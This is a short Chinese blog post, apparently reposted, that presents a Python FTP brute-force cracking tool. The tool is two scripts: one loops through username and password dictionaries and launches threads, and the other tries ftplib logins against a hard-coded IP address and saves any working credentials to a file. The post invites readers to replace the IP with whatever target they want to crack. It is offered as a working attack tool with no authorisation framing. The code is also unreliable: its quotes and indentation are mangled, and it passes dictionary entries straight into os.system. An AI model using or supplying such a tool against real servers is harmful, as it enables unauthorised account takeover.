• 利用python打造自己的ftp暴力破解工具


    python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要,根据自身的情况编写需要的程序,让程序代替我们去做一些枯燥的重复工作。下面直接上代码,下面是主文件main.py

    import os
    import time
    import threading

    class mythread(threading.Thread):
    def __init__(self,command):
    threading.Thread.__init__(self)
    self.command=command
    def run(self):
    kk=os.system(self.command)
    ushand=open(“user.txt”,”r”)
    pshand=open(“passwd.txt”,”r”)
    listuser=[]
    listpass=[]
    for us in open(“user.txt”,”r”):
    lineus=ushand.readline().strip(‘ ’)
    listuser.append(lineus)
    for ps in open(“passwd.txt”,”r”):
    lineps=pshand.readline().strip(‘ ’)
    listpass.append(lineps)
    for i in listuser:
    for j in listpass:
    command=”ftp.py %s %s” %(i,j)
    print command
    my_thread=mythread(command)
    my_thread.start()
    time.sleep(0.1)

    相应的ftp.py文件里面的代码如下

    import ftplib
    import socket
    import sys
    ftp=ftplib.FTP(’121.54.175.204′)
    try:
    user=sys.argv[1]
    passwd=sys.argv[2]
    ftp.login(user,passwd)
    hand=open(‘aa.txt’,’a+’)
    hand.write(user+”:”+passwd+” ”)
    except ftplib.error_perm:
    print “passwd is world”

    由于插不近格式,里面的缩进的什么的得自己手动再调节一下

    需要两个文件,分别是user.txt和passwd.txt,这两个分别是用户名和账户的字典,其中的ftp破解IP可以自己修改成自己要破解的IP,最后正确的帐号和密码会输入到aa.txt文件中。

  • 相关阅读:
    jsp文件中charset和pageEncoding的区别
    如果jsp表单元素的值为空,如何避免null出现在页面上?
    C# 未在本地计算机上注册“Microsoft.Jet.OLEDB.4.0”提供程序。
    正则表达式
    事件委托与键盘事件
    事件对象的兼容性
    作用域解析题
    事件冒泡与事件铺获的解析
    浏览器内核
    js中级总结
  • 原文地址:https://www.cnblogs.com/zhuangjinhui/p/3474701.html
Copyright © 2020-2023  润新知